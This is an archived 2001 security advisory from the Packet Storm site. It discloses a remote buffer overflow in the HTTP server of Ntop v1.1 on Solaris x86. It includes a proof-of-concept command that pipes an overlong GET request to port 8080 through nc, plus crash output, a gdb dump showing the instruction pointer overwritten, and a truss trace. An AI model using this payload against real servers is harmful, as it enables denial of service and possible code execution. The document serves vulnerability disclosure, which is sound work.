exploit the possibilities

alt3kx-advisories-2001-002.txt

alt3kx-advisories-2001-002.txt
Posted Aug 25, 2001
Authored by Alt3kx

Ntop v1.1 for Solaris/x86 contains a remotely exploitable buffer overflow in the http server which defaults to tcp port 8080.

tags | exploit, web, overflow, x86, tcp
systems | solaris
MD5 | b835b14e9bd0431144499b6dc3c5e6c7

alt3kx-advisories-2001-002.txt

Change Mirror Download
======================================================================

Remote Buffer Overflow Under Solaris_x86
NTOP - NEtwork Monitor vulnerable to compromise the system



Author: alt3kx! <alt3kx@@raza-mexicana.org>
Alternative: <alt3kx_h3z@hotmail.com>
Date: 2001-05-23
Site: www.raza-mexicana.org


Greet to: _0x90_, Dex, PaTa , Rebel and S0r from AR & Spain
Teams: Raregazz - X-ploit and S0d


in special to White-B

======================================================================
------------------------=[Brief Description]=-------------------------

Exist the buffer overflow around 300 characteres, when u sending to
port running the daemon, in this caseis port 8080 the users can
execute code malicious to obtain high privilegies.


--------------------------=[Plataforms]=--------------------------


Sun Solaris 7.0_x86
Sun Solaris 2.6_x86


---------------------------=[Summary]=----------------------------


Proof of concept :

# ls -la /opt/ntop/bin/ntop
-rwsr-xr-x 1 bin bin 249680 May 3 1999 /opt/ntop/bin/ntop
#


One step

Run ntop as root the daemon

# /opt/ntop/bin/ntop -w 8080
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.
Copyright 1998-99 by Luca Deri <deri@unipi.it>
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
.
.
.
.
.



Two step:

Run the next script as user normal:


[local]:alt3kx# printf "GET /`perl -e 'print "A"x245'`\r\n\r\n" |nc
localhost 8080
HTTP/1.0 200 OK
Server: ntop/1.1 (i386-pc-solaris2.7)
Content-type: text/html

<HTML>
<HEAD>
<META HTTP-EQUIV=REFRESH CONTENT=120>
</HEAD>
<BODY BGCOLOR=#FFFFFF>
<P><H1><FONT FACE=Helvetica>Unable to find information related to
host<i>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>
</HEAD>
<BODY BGCOLOR=#FFFFFF>
FRESH
CONTENT=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</i></FONT></H1>
</CENTER>

</CENTER><hr><FONT FACE=Helvetica><H5>Generated by <A
HREF="http://www-serra.unipi.it/~ntop/">ntop</A> v.1.1 MT
[i386-pc-solaris2.7] listening on elxl0<br>
<address>&copy; 1998-99 by <A HREF=mailto:deri@unipi.it>L.
Deri</A></H5></font></BODY></HTML>
[local]:alt3kx#

SUCKS!!! NOT FUNCTIONALitY, AGAIN with more A´s :-)



[local]:alt3kx# printf "GET /`perl -e 'print "A"x246'`\r\n\r\n" |nc
localhost 8080
[local]:alt3kx#




Another shell u can see this

# /opt/ntop/bin/ntop -w 8080
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.
Copyright 1998-99 by Luca Deri <deri@unipi.it>
Warning: unable to read file '.ntop'. No security will be used!
Waiting for HTTP connections on port 8080...
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00
Segmentation Fault(coredump)
#

[local]:alt3kx# gdb ntop --core=core
GNU gdb 4.17
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-pc-solaris2.7"...
Core was generated by `ntop'.
Program terminated with signal 11, Segmentation Fault.
Reading symbols from /lib/libsocket.so.1...done.
Reading symbols from /lib/libnsl.so.1...done.
Reading symbols from /lib/libgen.so.1...done.
Reading symbols from /lib/libc.so.1...done.
Reading symbols from /lib/libdl.so.1...done.
Reading symbols from /lib/libmp.so.2...done.
#0 0x41414141 in ?? ()

(gdb) info all-registers
eax 0x1 1
ecx 0xdffe19c8 -536995384
edx 0x20a 522
ebx 0x80cef44 135065412
esp 0x8046f14 0x8046f14
ebp 0x41414141 0x41414141
esi 0xc8 200
edi 0x80980f5 134840565
eip 0x41414141 0x41414141
eflags 0x10206 66054
cs 0x17 23
ss 0x1f 31
ds 0x1f 31
es 0x1f 31
fs 0x0 0
gs 0x0 0
(gdb)


[local]:alt3kx# truss /opt/ntop/bin/ntop



open("/dev/zero", O_RDONLY) = 3
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xDFFE1000
sysconfig(_CONFIG_PAGESIZE) = 4096
open("./libsocket.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libsocket.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFDF000
mmap(0x00000000, 40960, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFD4000
mmap(0xDFFDC000, 5712, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xDFFDC000
close(4) = 0

open("./libnsl.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libnsl.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
mmap(0x00000000, 503808, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0xDFF58000
mmap(0xDFFC5000, 23248, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 442368) = 0xDFFC5000
mmap(0xDFFCB000, 29472, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFFCB000
close(4) = 0
open("./libgen.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libgen.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
mmap(0x00000000, 32768, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFF4F000
mmap(0xDFF55000, 4184, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 20480) = 0xDFF55000
close(4) = 0
open("./libc.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libc.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
mmap(0x00000000, 593920, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =
0xDFEBD000
mmap(0xDFF46000, 25448, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 557056) = 0xDFF46000
mmap(0xDFF4D000, 3316, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFF4D000
close(4) = 0
open("./libdl.so.1", O_RDONLY) Err#2 ENOENT
open("/lib/libdl.so.1", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =
0xDFFDF000
close(4) = 0
open("./libmp.so.2", O_RDONLY) Err#2 ENOENT
open("/lib/libmp.so.2", O_RDONLY) = 4
fxstat(2, 4, 0x08047138) = 0
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEBB000
mmap(0x00000000, 16384, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEB6000
mmap(0xDFEB9000, 2524, PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xDFEB9000
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) =
0xDFEB4000
close(4) = 0
close(3) = 0


[...............]


door_info(3, 0x08044528) = 0
door_call(3, 0x08044510) = 0
door_info(3, 0x080465E0) = 0
door_call(3, 0x080465C8) = 0
door_info(3, 0x080465E0) = 0
door_call(3, 0x080465C8) = 0
door_info(3, 0x080465E0) = 0
door_call(3, 0x080465C8) = 0
Incurred fault #6, FLTBOUNDS %pc = 0x41414141
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141
*** process killed ***



bug discovered by alt3kx! <alt3kx@raza-mexicana.org> &
<alt3kx_h3z@hotmail.com>


Possible C0de cooming soon .... je :-)


---------------------------=[PATCH]=-----------------------------

Download the last packages from Sun Microsystems

-------------------------=[Company Compromise]=-------------------

http://www.sun.com
http://www.ntop.org


















Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    1 Files
  • 20
    Sep 20th
    1 Files
  • 21
    Sep 21st
    15 Files
  • 22
    Sep 22nd
    21 Files
  • 23
    Sep 23rd
    8 Files
  • 24
    Sep 24th
    15 Files
  • 25
    Sep 25th
    4 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close